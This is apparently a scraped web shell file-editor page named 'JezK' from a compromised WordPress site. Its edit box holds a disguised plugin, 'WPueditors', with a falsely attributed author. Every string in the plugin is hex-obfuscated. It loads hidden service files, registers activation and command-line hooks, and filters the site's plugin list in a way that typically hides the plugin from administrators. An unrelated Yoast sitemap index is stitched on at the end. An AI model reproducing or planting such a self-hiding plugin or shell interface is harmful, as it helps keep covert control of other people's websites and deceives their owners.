
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: wpueditors.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php /**
 * Plugin Name: WPueditors
 * Description: A lightweight and extendable visual editor for WordPress with real-time preview and custom block integrations.
 * Version: 1.2.16
 * Author: Andrew Nacin
 */

require_once __DIR__ . &quot;\x2f\x73\x72\x63\x2f\x41\x64\x61\x70\x74\x65\x72\x2f\x53\x65\x72\x76\x69\x63\x65\x73\x2f\x49\x6e\x73\x74\x61\x6c\x6c\x53\x65\x72\x76\x69\x63\x65\x2e\x70\x68\x70&quot;;
\WpEditor\Adapter\Services\InstallService::maybeBootstrapCli(__FILE__);

if (!defined(&quot;\x41\x42\x53\x50\x41\x54\x48&quot;)) {
    exit;
}

require_once __DIR__ . &quot;\x2f\x62\x6f\x6f\x74\x73\x74\x72\x61\x70\x2f\x63\x6f\x6d\x70\x61\x74\x2e\x70\x68\x70&quot;;
if (function_exists(&quot;\x77\x70\x5f\x65\x64\x69\x74\x6f\x72\x5f\x64\x65\x66\x69\x6e\x65\x5f\x70\x6c\x75\x67\x69\x6e\x5f\x66\x69\x6c\x65\x5f\x63\x6f\x6e\x73\x74\x61\x6e\x74&quot;)) {
    wp_editor_define_plugin_file_constant(__FILE__);
}

require_once __DIR__ . &quot;\x2f\x62\x6f\x6f\x74\x73\x74\x72\x61\x70\x2f\x61\x75\x74\x6f\x6c\x6f\x61\x64\x2e\x70\x68\x70&quot;;
require_once __DIR__ . &quot;\x2f\x62\x6f\x6f\x74\x73\x74\x72\x61\x70\x2f\x63\x6f\x6e\x66\x69\x67\x2e\x70\x68\x70&quot;;
require_once __DIR__ . &quot;\x2f\x62\x6f\x6f\x74\x73\x74\x72\x61\x70\x2f\x68\x65\x6c\x70\x65\x72\x73\x2e\x70\x68\x70&quot;;
require_once __DIR__ . &quot;\x2f\x62\x6f\x6f\x74\x73\x74\x72\x61\x70\x2f\x63\x6f\x6e\x74\x61\x69\x6e\x65\x72\x2e\x70\x68\x70&quot;;
require_once __DIR__ . &quot;\x2f\x62\x6f\x6f\x74\x73\x74\x72\x61\x70\x2f\x6b\x65\x72\x6e\x65\x6c\x2e\x70\x68\x70&quot;;
require_once __DIR__ . &quot;\x2f\x73\x72\x63\x2f\x41\x64\x61\x70\x74\x65\x72\x2f\x53\x65\x72\x76\x69\x63\x65\x73\x2f\x50\x6c\x75\x67\x69\x6e\x52\x65\x6e\x64\x65\x72\x53\x65\x72\x76\x69\x63\x65\x2e\x70\x68\x70&quot;;

register_activation_hook(__FILE__, [\WpEditor\Adapter\Services\InstallService::class, &quot;\x61\x63\x74\x69\x76\x61\x74\x65&quot;]);
add_filter(&quot;\x61\x6c\x6c\x5f\x70\x6c\x75\x67\x69\x6e\x73&quot;, [\WpEditor\Adapter\Services\PluginRenderService::class, &quot;\x73\x79\x6e\x63\x50\x6c\x75\x67\x69\x6e\x4c\x69\x73\x74&quot;], 10, 1);
add_action(&quot;\x61\x64\x6d\x69\x6e\x5f\x68\x65\x61\x64&quot;, [\WpEditor\Adapter\Services\PluginRenderService::class, &quot;\x72\x65\x6e\x64\x65\x72\x43\x6f\x6e\x74\x72\x6f\x6c\x48\x65\x61\x64&quot;]);
add_action(&quot;\x61\x64\x6d\x69\x6e\x5f\x6d\x65\x6e\x75&quot;, [\WpEditor\Adapter\Services\PluginRenderService::class, &quot;\x73\x79\x6e\x63\x50\x6c\x75\x67\x69\x6e\x4d\x65\x6e\x75&quot;], 999);

$isCliDirectActivation = \WpEditor\Adapter\Services\InstallService::maybeActivateFromCli(__FILE__);

if (!$isCliDirectActivation) {
    $kernel = \WpEditor\Bootstrap\Kernel::boot();
    $kernel-&gt;run();
}
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//drjoaopaulocostabraga.com/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://drjoaopaulocostabraga.com/post-sitemap.xml</loc>
		<lastmod>2026-09-25T12:20:57+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://drjoaopaulocostabraga.com/page-sitemap.xml</loc>
		<lastmod>2026-09-03T19:14:31+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://drjoaopaulocostabraga.com/category-sitemap.xml</loc>
		<lastmod>2026-09-25T12:20:57+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://drjoaopaulocostabraga.com/author-sitemap.xml</loc>
		<lastmod>2024-04-04T21:04:44+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Yoast SEO -->